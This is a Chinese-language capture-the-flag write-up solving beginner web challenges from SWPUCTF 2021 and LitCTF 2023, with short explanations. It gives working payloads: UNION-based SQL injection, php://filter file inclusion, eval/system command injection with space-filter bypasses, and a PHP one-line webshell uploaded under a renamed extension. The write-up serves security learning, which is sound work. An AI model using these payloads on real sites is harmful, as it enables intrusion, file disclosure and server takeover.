1、[SWPUCTF 2021 新生赛]gift_F12
这题flag藏在前端的源码里,只需要查看源码就好了
最后改成题目所需要的flag形式
2、[SWPUCTF 2021 新生赛]jicao
打开这题,这题是一个php代码审计的题目,然后的话,这里主要来看一下 json_decode 这个函数,
首先这个函数接收两个参数
第一个参数:带解码的JSON字符串
第二个参数:是一个布尔值(默认设置为false),当为true时候,将JSON对象解码为关联数组;当为false的时候结尾为php对象
例如:
$json = json_decode('{"name":"John","age":30}', true);
当第二个参数为true时候,经过json_decode后 :——>Array( [name] => John [age] => 30)
$json = json_decode('{"name":"John","age":30}', false);
当第二个参数为false时候,就得到一个php类,此时就可以通过类调用成员属性,如$ json->name=John
最后的payload:
GET:json={"x":"wllm"}
POST:id=wllmNB
3、[SWPUCTF 2021 新生赛]easy_md5
看到md5就直接用数组绕过了,注意传参方式就行了
payload:
GET:name[]=1
POST:password[]=12
4、[SWPUCTF 2021 新生赛]include
开始提示传一个file进去,用file作为参数然后用get请求传进去就来到上面这个页面
最后看到一个 include_once 函数,就知道要文件包含了,
data协议我用了好像没有反应,最后用?file=php://filter就出来了,最后拿去base64解码
payload:GET:file=php://filter/read=convert.base64-encode/resource=flag.php
5、[SWPUCTF 2021 新生赛]easy_sql
这题是一道sql注入,额,过滤了#号,用--+代替就行了,其他都是常规操作
-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+
test_tb,users
-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='test_tb'--+
id,flag
-1' union select 1,2,flag from test_tb
6、[SWPUCTF 2021 新生赛]easyrce
通过url控制eval的参数,所有直接执行系统命令,传入
system('ls /');
payload:?url=system('cat /flllllaaaaaaggggggg');
7、[SWPUCTF 2021 新生赛]caidao
这题打开有个一句话木马,直接蚁剑连接,也可以通过命令执行来拿flag
8、[SWPUCTF 2021 新生赛]Do_you_know_http
这题用bp抓包,然后改user-agent 和 X-Forwarded-For就行了
9、[LitCTF 2023]我Flag呢?
这题直接查看源码就出来了
10、[SWPUCTF 2021 新生赛]babyrce
跟着题目来,在http头传一个cookie:amdin=1(注意cookie中的参数之间用分号隔开),接着就出现了下面这个页面
访问rasalghul.php
最后有个命令执行函数,参数过滤了空格,使用 ${IFS}或者%09绕过空格就行了
最后的payload:rasalghul.php?url=cat%09/flllllaaaaaaggggggg
11、 [第五空间 2021]WebFTP
这用御剑扫描出来了phpinfo.php
然后访问这个文件,最后搜索关键字,nssctf就可以看到flag了·
12、[SWPUCTF 2021 新生赛]easyupload2.0
这题的话直接在文件里放一个马,然后文件名过滤了php后缀,直接改成phtml就行了
最后用蚁剑连接
13、[LitCTF 2023]PHP是世界上最好的语言!!
这题直接复制输出内容就行了
如果有不成功的话就写入
13、[SWPUCTF 2021 新生赛]easyupload1.0
传马:
<?= eval($_POST[1]);?>
改后缀,最后访问
/upload/2.php
命令执行
post:
1=system('cat /var/www/html/flag.php');